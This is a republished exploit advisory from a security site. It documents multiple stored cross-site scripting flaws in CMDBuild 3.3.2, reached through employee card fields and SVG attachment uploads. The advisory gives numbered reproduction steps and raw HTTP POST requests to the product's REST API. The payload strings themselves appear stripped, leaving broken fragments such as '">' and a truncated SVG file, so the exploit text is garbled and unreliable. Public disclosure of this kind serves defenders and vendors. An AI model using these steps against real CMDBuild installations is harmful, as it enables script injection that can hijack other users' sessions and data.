Exploit/Advisories no image

Published on November 16th, 2021 📆 | 8356 Views ⚑

0

CMDBuild 3.3.2 Cross Site Scripting – Torchsec


Text to Speech Demo

# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
# Date: 15/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.cmdbuild.org
# Software Link: https://www.cmdbuild.org/en/download/latest-version
# Version: CMDBuild 3.3.2
# Tested on: Linux

Summary:

Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections

Proof of concepts :

Stored Xss Example:

1-Login to you'r Dashboard As a low privilege user
2-Click On Basic archives and Employee
3- +Add card Employee
4- Enter your xss payload in parameters
5-On added employee click on "Open Relation Graph"

POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
...
Cmdbuild-Actionid: class.card.new.open
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353

Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
X-Requested-With: XMLHttpRequest
Content-Length: 302
Connection: close





{"_type":"Employee","_tenant":"","Code":"">","Description":null,"Surname":"">","Name":"">","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}

------------------------------------------------------------------------

File upload Xss example:

1-Click on Basic archives
2-Click on Workplace - + Add card Workplace
3-Select "attachments" icon - +Add attachment + image
4-Upload your svg file with xss payload
5-Click on preview and Right click open in new tab

Request:
POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
Cmdbuild-Actionid: class.card.attachments.open

-----------------------------269319782833689825543405205260
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
Content-Type: image/svg+xml

< ?xml version="1.0" encoding="utf-8"?>

< !DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
width="300"612px" height="400"502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174"
xml:space="preserve">

Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑